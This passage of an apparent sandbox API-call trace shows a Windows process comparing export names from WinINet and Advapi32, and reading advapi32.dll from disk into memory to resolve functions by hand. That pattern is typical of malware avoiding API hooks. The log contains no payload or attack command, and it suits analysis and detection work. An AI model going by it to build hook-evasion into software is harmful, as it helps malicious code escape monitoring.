[0245.177] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0245.177] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0245.177] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0245.177] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0245.177] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0245.177] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0245.177] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0245.177] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0245.177] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0245.177] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0245.177] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0245.178] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0245.178] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0245.178] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0245.178] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0245.178] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0245.178] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0245.178] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0245.178] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0245.178] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0245.178] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0245.178] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0245.179] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0245.179] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0245.179] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0245.179] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0245.179] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0245.179] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0245.179] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0245.179] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0245.179] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0245.179] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0245.179] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0245.179] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0245.179] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0245.179] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0245.179] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0245.179] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0245.179] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0245.179] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0245.179] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0245.179] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0245.179] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0245.179] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0245.179] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0245.179] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0245.179] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0245.180] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0245.180] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0245.180] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0245.180] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0245.180] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0245.180] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0245.180] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0245.180] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0245.180] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0245.180] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0245.180] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0245.180] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0245.180] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0245.180] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0245.180] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0245.180] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0245.180] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0245.180] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0245.180] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0245.180] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0245.180] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0245.180] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0245.180] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0245.180] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0245.181] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0245.181] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0245.181] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0245.181] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0245.181] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0245.181] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0245.181] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0245.181] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0245.181] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0245.181] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0245.198] GetProcessHeap () returned 0x4e0000 [0245.198] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x40ec040 | out: hHeap=0x4e0000) returned 1 [0245.466] GetProcessHeap () returned 0x4e0000 [0245.466] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x10) returned 0x4f9200 [0245.468] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0245.468] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0245.468] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0245.469] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0245.470] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0245.470] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0245.470] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0245.470] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0245.470] GetProcessHeap () returned 0x4e0000 [0245.470] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0xa3ef0) returned 0x2d22010 [0245.472] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0245.472] ReadFile (in: hFile=0x140, lpBuffer=0x2d22010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d22010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0245.484] CloseHandle (hObject=0x140) returned 1 [0245.484] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0245.485] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0245.485] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0245.485] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0245.485] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0245.485] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0245.485] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0245.485] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0245.485] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0245.485] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0245.485] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0245.485] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0245.485] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0245.485] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0245.485] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0245.485] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0245.485] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0245.485] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0245.485] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0245.485] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0245.485] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0245.485] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0245.486] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0245.486] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0245.486] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0245.486] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0245.486] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0245.486] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0245.486] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0245.486] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0245.486] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0245.486] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0245.486] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0245.486] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0245.486] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0245.486] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0245.486] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0245.486] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0245.486] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0245.486] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0245.486] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0245.486] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0245.486] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0245.486] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0245.486] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0245.486] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0245.486] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0245.486] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0245.486] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0245.486] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0245.487] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0245.488] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0245.489] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0245.489] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0245.489] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0245.489] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0245.489] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0245.489] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0245.489] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0245.489] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0245.489] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0245.489] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0245.489] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0245.489] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0245.489] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0245.489] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0245.489] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0245.489] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0245.489] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0245.489] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0245.489] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0245.489] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0245.489] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0245.489] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0245.489] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0245.489] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0245.489] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0245.489] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0245.489] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0245.489] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0245.489] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0245.489] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0245.489] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0245.490] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0245.490] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0245.490] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0245.490] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0245.490] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0245.490] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0245.490] lstrcmpA 